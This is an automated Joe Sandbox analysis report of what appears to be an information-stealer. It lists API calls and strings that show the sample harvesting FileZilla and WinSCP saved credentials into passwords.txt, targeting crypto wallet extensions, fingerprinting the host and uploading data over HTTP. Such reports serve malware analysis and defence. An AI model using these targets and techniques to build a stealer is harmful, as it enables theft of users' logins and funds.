                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 000256C0
                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 00025704
                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00025736
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,",file_data,00057850,------,00057844,?,",00057838,------,0005782C,744fd163d6d4e0ac37e4032bcbfbb6af,",build_id,00057814,------), ref: 00025C67
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00025C7A
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00025C92
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 00025C99
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00025CA6
                                                                                                                                                                                          • _memmove.LIBCMT ref: 00025CB4
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,?), ref: 00025CC9
                                                                                                                                                                                          • _memmove.LIBCMT ref: 00025CD6
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00025CE4
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 00025CF2
                                                                                                                                                                                          • _memmove.LIBCMT ref: 00025D05
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 00025D1A
                                                                                                                                                                                          • HttpSendRequestA.WININET(?,?,00000000), ref: 00025D2D
                                                                                                                                                                                          • HttpQueryInfoA.WININET(?,00000013,?,?,00000000), ref: 00025D6F
                                                                                                                                                                                          • InternetReadFile.WININET(?,?,000007CF,?), ref: 00025E26
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?,block), ref: 00025E3B
                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 00025E46
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$Internetlstrcpy$Heap$HttpProcess_memmove$AllocOpenRequestlstrcat$BinaryConnectCrackCryptExitFileInfoOptionQueryReadSendString
                                                                                                                                                                                          • String ID: ------$"$"$"$"$--$------$------$------$------$744fd163d6d4e0ac37e4032bcbfbb6af$ERROR$ERROR$block$build_id$file_data

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00031DBC: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,?), ref: 00031DFD
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00027FAC: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,?,?,?,0002E756,?,?,?), ref: 00027FC7
                                                                                                                                                                                            • Part of subcall function 00027FAC: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,0002E756,?,?,?), ref: 00027FDE
                                                                                                                                                                                            • Part of subcall function 00027FAC: LocalAlloc.KERNEL32(00000040,?,?,?,?,?,0002E756,?,?,?), ref: 00027FF5
                                                                                                                                                                                            • Part of subcall function 00027FAC: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,0002E756,?,?,?), ref: 0002800C
                                                                                                                                                                                            • Part of subcall function 00027FAC: CloseHandle.KERNEL32(?,?,?,?,?,0002E756,?,?,?), ref: 00028034
                                                                                                                                                                                            • Part of subcall function 00031E1F: LocalAlloc.KERNEL32(00000040,00000001,?,?,?,00036931,?), ref: 00031E37
                                                                                                                                                                                          • strtok_s.MSVCRT ref: 0002E77E
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx,00056912,0005690F,0005690E,0005690D), ref: 0002E7C4
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0002E7CB
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 0002E7DF
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0002E7EA
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 0002E81E
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0002E829
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,<User>), ref: 0002E857
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0002E862
                                                                                                                                                                                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 0002E890
                                                                                                                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0002E89B
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002E901
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002E915
                                                                                                                                                                                          • lstrlenA.KERNEL32(0002ECBC), ref: 0002EA3D
                                                                                                                                                                                            • Part of subcall function 00036E97: CreateThread.KERNEL32(00000000,00000000,00036DC6,?,00000000,00000000), ref: 00036F36
                                                                                                                                                                                            • Part of subcall function 00036E97: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00036F3E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          • \AppData\Roaming\FileZilla\recentservers.xml, xrefs: 0002E71F
                                                                                                                                                                                          • qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx, xrefs: 0002E7BD
                                                                                                                                                                                          • <Port>, xrefs: 0002E818
                                                                                                                                                                                          • <User>, xrefs: 0002E851
                                                                                                                                                                                          • <Pass encoding="base64">, xrefs: 0002E88A
                                                                                                                                                                                          • Soft: FileZilla, xrefs: 0002E948
                                                                                                                                                                                          • Password: , xrefs: 0002E9AE
                                                                                                                                                                                          • <Host>, xrefs: 0002E7D9
                                                                                                                                                                                          • Host: , xrefs: 0002E954
                                                                                                                                                                                          • passwords.txt, xrefs: 0002EA4D
                                                                                                                                                                                          • Login: , xrefs: 0002E98C
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrlen$lstrcpy$AllocFile$CreateHeapLocallstrcat$CloseFolderHandleObjectPathProcessReadSingleSizeThreadWaitstrtok_s
                                                                                                                                                                                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$Host: $Login: $Password: $Soft: FileZilla$\AppData\Roaming\FileZilla\recentservers.xml$passwords.txt$qZWRuZ3BsZmptbm9vcHBiY2xra3wxfDB8MHxPcGVuTWFzayBXYWxsZXR8MXxwZW5qbGRkamtqZ3Bua2xsYm9jY2RnY2Nla3BrY2JpbnwxfDB8MHxTYWZlUGFsIFdhbGxldHwxfGFwZW5rZmJicG1oaWhlaG1paG5kbW1jZGFuYWNvbG5ofDF8MHwwfEJpdGdldCBXYWxsZXR8MXxqaWlkaWFhbGlobW1oZGRqZ2JuYmdkZmZsZWxvY3Bha3wxfDB8MHx
                                                                                                                                                                                          • API String ID: 4146028692-1548688356
                                                                                                                                                                                          • Opcode ID: a07c1bb5225821098ab2054c548edf8bd496c5ac73e8a459bc4023d8bcc3a28e
                                                                                                                                                                                          • Instruction ID: 6d1fcb36c0681bd6a9c419d84dbf7b92fbea3be01544b2019a04b3579b2cdac1
                                                                                                                                                                                          • Opcode Fuzzy Hash: a07c1bb5225821098ab2054c548edf8bd496c5ac73e8a459bc4023d8bcc3a28e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8DA1F232941219BBCF01BBE0FC5B9DE7B78AF18701F514460FA09B7152DB71AA49CBA1

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • _memset.LIBCMT ref: 0002E1B7
                                                                                                                                                                                          • _memset.LIBCMT ref: 0002E1D7
                                                                                                                                                                                          • _memset.LIBCMT ref: 0002E1E8
                                                                                                                                                                                          • _memset.LIBCMT ref: 0002E1F9
                                                                                                                                                                                          • RegOpenKeyExA.KERNEL32(80000001,Software\Martin Prikryl\WinSCP 2\Configuration,00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0002E22D
                                                                                                                                                                                          • RegGetValueA.ADVAPI32(?,Security,UseMasterPassword,00000010,00000000,?,?), ref: 0002E25E
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0002E276
                                                                                                                                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0002E29D
                                                                                                                                                                                          • RegOpenKeyExA.ADVAPI32(80000001,Software\Martin Prikryl\WinSCP 2\Sessions,00000000,00000009,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0002E2BD
                                                                                                                                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,00000104,00000000,00000000,00000000,00000000), ref: 0002E2E0
                                                                                                                                                                                          • RegGetValueA.ADVAPI32(?,?,HostName,00000002,00000000,?,?,Host: ,Soft: WinSCP,000568E7), ref: 0002E379
                                                                                                                                                                                          • RegGetValueA.ADVAPI32(?,?,PortNumber,0000FFFF,00000000,?,?,?), ref: 0002E3D9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: _memset$Value$CloseOpen$Enum
                                                                                                                                                                                          • String ID: Login: $:22$Host: $HostName$Password$Password: $PortNumber$Security$Soft: WinSCP$Software\Martin Prikryl\WinSCP 2\Configuration$Software\Martin Prikryl\WinSCP 2\Sessions$UseMasterPassword$UserName$passwords.txt
                                                                                                                                                                                          • API String ID: 463713726-2798830873
                                                                                                                                                                                          • Opcode ID: 60b9483c8702a07540cc69f8b90d3d9860d546c1b64e18d0fca74686d819e6a6
                                                                                                                                                                                          • Instruction ID: c4446a8a36f14c54b2b06fda4df8eebfad62ae036cc9232151e7296e888a6e67
                                                                                                                                                                                          • Opcode Fuzzy Hash: 60b9483c8702a07540cc69f8b90d3d9860d546c1b64e18d0fca74686d819e6a6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5CD1C77295112DEADF21EB90EC41BDAB778AF04304F4045E7AA08B6052DA707F89DFA1

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AE8
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AEE
                                                                                                                                                                                            • Part of subcall function 00024AB6: ??_U@YAPAXI@Z.MSVCRT(00000400), ref: 00024AF4
                                                                                                                                                                                            • Part of subcall function 00024AB6: lstrlenA.KERNEL32(000000FF,00000000,?), ref: 00024B06
                                                                                                                                                                                            • Part of subcall function 00024AB6: InternetCrackUrlA.WININET(000000FF,00000000), ref: 00024B0E
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • InternetOpenA.WININET(?,00000001,00000000,00000000,00000000), ref: 00025FD8
                                                                                                                                                                                          • StrCmpCA.SHLWAPI(?), ref: 00025FF6
                                                                                                                                                                                          • InternetConnectA.WININET(?,?,?,00000000,00000000,00000003,00000000,00000000), ref: 0002618E
                                                                                                                                                                                          • HttpOpenRequestA.WININET(?,?,00000000,00000000,?,00000000), ref: 000261D2
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,",mode,000578D8,------,000578CC,744fd163d6d4e0ac37e4032bcbfbb6af,",build_id,000578B4,------,000578A8,",0005789C,------), ref: 000265FD
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002660C
                                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00026617
                                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 0002661E
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 0002662B
                                                                                                                                                                                          • _memmove.LIBCMT ref: 00026639
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00026647
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 00026655
                                                                                                                                                                                          • _memmove.LIBCMT ref: 00026662
                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,00000000), ref: 00026677
                                                                                                                                                                                          • HttpSendRequestA.WININET(00000000,?,00000000), ref: 00026685
                                                                                                                                                                                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 000266E2
                                                                                                                                                                                          • InternetCloseHandle.WININET(00000000), ref: 000266ED
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 000266F9
                                                                                                                                                                                          • InternetCloseHandle.WININET(?), ref: 00026705
                                                                                                                                                                                          • InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 00026200
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internetlstrlen$lstrcpy$CloseHandle$HeapHttpOpenRequest_memmovelstrcat$AllocConnectCrackFileOptionProcessReadSend
                                                                                                                                                                                          • String ID: "$"$"$------$------$------$------$744fd163d6d4e0ac37e4032bcbfbb6af$build_id$mode

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          control_flow_graph 912 38643-38653 call 3859a 915 38844-388a1 LoadLibraryA * 5 912->915 916 38659-3883f call 27d47 GetProcAddress * 20 912->916 918 388a3-388b0 GetProcAddress 915->918 919 388b5-388bc 915->919 916->915 918->919 921 388e7-388ee 919->921 922 388be-388e2 GetProcAddress * 2 919->922 923 38902-38909 921->923 924 388f0-388fd GetProcAddress 921->924 922->921 926 3890b-38918 GetProcAddress 923->926 927 3891d-38924 923->927 924->923 926->927 928 38926-3894a GetProcAddress * 2 927->928 929 3894f 927->929 928->929
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00038684
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 0003869B
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 000386B2
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 000386C9
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 000386E0
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 000386F7
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 0003870E
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00038725
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 0003873C
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00038753
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 0003876A
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00038781
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00038798
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 000387AF
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 000387C6
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 000387DD
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 000387F4
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 0003880B
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00038822
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00038839
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,000384C2), ref: 0003884A
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,000384C2), ref: 0003885B
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,000384C2), ref: 0003886C
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,000384C2), ref: 0003887D
                                                                                                                                                                                          • LoadLibraryA.KERNEL32(?,000384C2), ref: 0003888E
                                                                                                                                                                                          • GetProcAddress.KERNEL32(75070000,000384C2), ref: 000388AA
                                                                                                                                                                                          • GetProcAddress.KERNEL32(75FD0000,000384C2), ref: 000388C5
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 000388DC
                                                                                                                                                                                          • GetProcAddress.KERNEL32(75A50000,000384C2), ref: 000388F7
                                                                                                                                                                                          • GetProcAddress.KERNEL32(74E50000,000384C2), ref: 00038912
                                                                                                                                                                                          • GetProcAddress.KERNEL32(76E80000,000384C2), ref: 0003892D
                                                                                                                                                                                          • GetProcAddress.KERNEL32 ref: 00038944
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: AddressProc$LibraryLoad
                                                                                                                                                                                          • String ID:

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 00030CC0: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,000565B6,?,?,?), ref: 00030CD8
                                                                                                                                                                                            • Part of subcall function 00030CC0: HeapAlloc.KERNEL32(00000000), ref: 00030CDF
                                                                                                                                                                                            • Part of subcall function 00030CC0: GetLocalTime.KERNEL32(?), ref: 00030CEB
                                                                                                                                                                                            • Part of subcall function 00030CC0: wsprintfA.USER32 ref: 00030D16
                                                                                                                                                                                            • Part of subcall function 000315D4: _memset.LIBCMT ref: 00031607
                                                                                                                                                                                            • Part of subcall function 000315D4: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 00031626
                                                                                                                                                                                            • Part of subcall function 000315D4: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 0003164B
                                                                                                                                                                                            • Part of subcall function 000315D4: RegCloseKey.ADVAPI32(?,?,?,?), ref: 00031657
                                                                                                                                                                                            • Part of subcall function 000315D4: CharToOemA.USER32(?,?), ref: 0003166B
                                                                                                                                                                                            • Part of subcall function 00031684: GetCurrentHwProfileA.ADVAPI32(?), ref: 0003169F
                                                                                                                                                                                            • Part of subcall function 00031684: _memset.LIBCMT ref: 000316CE
                                                                                                                                                                                            • Part of subcall function 00031684: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 000316F6
                                                                                                                                                                                            • Part of subcall function 00031684: lstrcatA.KERNEL32(?,00056ECC,?,?,?,?,?), ref: 00031713
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 000309A2: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 000309D5
                                                                                                                                                                                            • Part of subcall function 000309A2: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00030A15
                                                                                                                                                                                            • Part of subcall function 000309A2: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00030A6A
                                                                                                                                                                                            • Part of subcall function 000309A2: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00030A71
                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32(Path: ,0005687C,HWID: ,00056870,GUID: ,00056864,00000000,MachineID: ,00056854,00000000,Date: ,00056848,00056844,000579AC,Version: ,000565B6), ref: 00033DDB
                                                                                                                                                                                            • Part of subcall function 0003224A: OpenProcess.KERNEL32(00000410,00000000,00033DEA,00000000,?), ref: 0003226C
                                                                                                                                                                                            • Part of subcall function 0003224A: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 00032287
                                                                                                                                                                                            • Part of subcall function 0003224A: CloseHandle.KERNEL32(00000000), ref: 0003228E
                                                                                                                                                                                            • Part of subcall function 00030B30: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00033E95,Windows: ,000568A0), ref: 00030B44
                                                                                                                                                                                            • Part of subcall function 00030B30: HeapAlloc.KERNEL32(00000000,?,?,?,00033E95,Windows: ,000568A0), ref: 00030B4B
                                                                                                                                                                                            • Part of subcall function 00031807: __EH_prolog3_catch_GS.LIBCMT ref: 0003180E
                                                                                                                                                                                            • Part of subcall function 00031807: CoInitializeEx.OLE32(00000000,00000000,0000004C,00033EF9,Install Date: ,000568B0,00000000,Windows: ,000568A0,Work Dir: In memory,00056888), ref: 0003181F
                                                                                                                                                                                            • Part of subcall function 00031807: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00031830
                                                                                                                                                                                            • Part of subcall function 00031807: CoCreateInstance.OLE32(00052F00,00000000,00000001,00052E30,?), ref: 0003184A
                                                                                                                                                                                            • Part of subcall function 00031807: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00031880
                                                                                                                                                                                            • Part of subcall function 00031807: VariantInit.OLEAUT32(?), ref: 000318DB
                                                                                                                                                                                            • Part of subcall function 00031997: __EH_prolog3_catch.LIBCMT ref: 0003199E
                                                                                                                                                                                            • Part of subcall function 00031997: CoInitializeEx.OLE32(00000000,00000000,00000030,00033F67,?,AV: ,000568C4,Install Date: ,000568B0,00000000,Windows: ,000568A0,Work Dir: In memory,00056888), ref: 000319AD
                                                                                                                                                                                            • Part of subcall function 00031997: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 000319BE
                                                                                                                                                                                            • Part of subcall function 00031997: CoCreateInstance.OLE32(00052F00,00000000,00000001,00052E30,?), ref: 000319D8
                                                                                                                                                                                            • Part of subcall function 00031997: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00031A0E
                                                                                                                                                                                            • Part of subcall function 00031997: VariantInit.OLEAUT32(?), ref: 00031A5D
                                                                                                                                                                                            • Part of subcall function 00030C85: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00021385), ref: 00030C91
                                                                                                                                                                                            • Part of subcall function 00030C85: HeapAlloc.KERNEL32(00000000,?,?,?,00021385), ref: 00030C98
                                                                                                                                                                                            • Part of subcall function 00030C85: GetComputerNameA.KERNEL32(00000000,00021385), ref: 00030CAC
                                                                                                                                                                                            • Part of subcall function 00030C53: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,000213B9), ref: 00030C5F
                                                                                                                                                                                            • Part of subcall function 00030C53: HeapAlloc.KERNEL32(00000000,?,?,?,000213B9), ref: 00030C66
                                                                                                                                                                                            • Part of subcall function 00030C53: GetUserNameA.ADVAPI32(00000000,000213B9), ref: 00030C7A
                                                                                                                                                                                            • Part of subcall function 00031563: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 00031575
                                                                                                                                                                                            • Part of subcall function 00031563: GetDeviceCaps.GDI32(00000000,00000008), ref: 00031580
                                                                                                                                                                                            • Part of subcall function 00031563: GetDeviceCaps.GDI32(00000000,0000000A), ref: 0003158B
                                                                                                                                                                                            • Part of subcall function 00031563: ReleaseDC.USER32(00000000,00000000), ref: 00031596
                                                                                                                                                                                            • Part of subcall function 00031563: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00034098,?,Display Resolution: ,000568F4,00000000,User Name: ,000568E4,00000000,Computer Name: ,000568D0,AV: ,000568C4), ref: 000315A2
                                                                                                                                                                                            • Part of subcall function 00031563: HeapAlloc.KERNEL32(00000000,?,?,00034098,?,Display Resolution: ,000568F4,00000000,User Name: ,000568E4,00000000,Computer Name: ,000568D0,AV: ,000568C4,Install Date: ), ref: 000315A9
                                                                                                                                                                                            • Part of subcall function 00031563: wsprintfA.USER32 ref: 000315BB
